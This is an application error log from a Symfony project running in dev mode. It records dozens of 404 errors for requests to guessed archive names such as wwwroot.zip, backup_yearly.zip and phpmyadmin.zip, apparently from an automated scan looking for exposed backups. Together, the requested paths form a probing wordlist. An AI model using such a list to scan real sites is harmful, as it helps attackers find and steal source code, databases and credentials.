[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wwwroot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wwwroot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mariadb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mariadb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clone.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clone.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_yearly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_yearly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /base.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /base.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /downloads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /downloads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /services.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /services.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /data.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /data.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /attachments.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /attachments.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /duplicate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /duplicate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /environment.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /environment.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rc.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rc.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /preferences.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /preferences.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dashboard.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dashboard.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /svn.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /svn.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /release-candidate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /release-candidate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /panel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /panel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /scripts.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /scripts.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /test.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /test.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /devtools.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /devtools.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /prototype.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /prototype.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /beta.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /beta.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /protected.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /protected.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /options.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /options.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cfg.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cfg.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /local.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /local.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpmyadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpmyadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /manager.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /manager.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /whm.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /whm.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrators.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrators.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /libraries.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /libraries.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /localhost.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /localhost.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bower_components.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bower_components.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /host.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /host.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /adminer.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /adminer.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /opt.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /opt.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oauth.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oauth.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /client.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /client.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
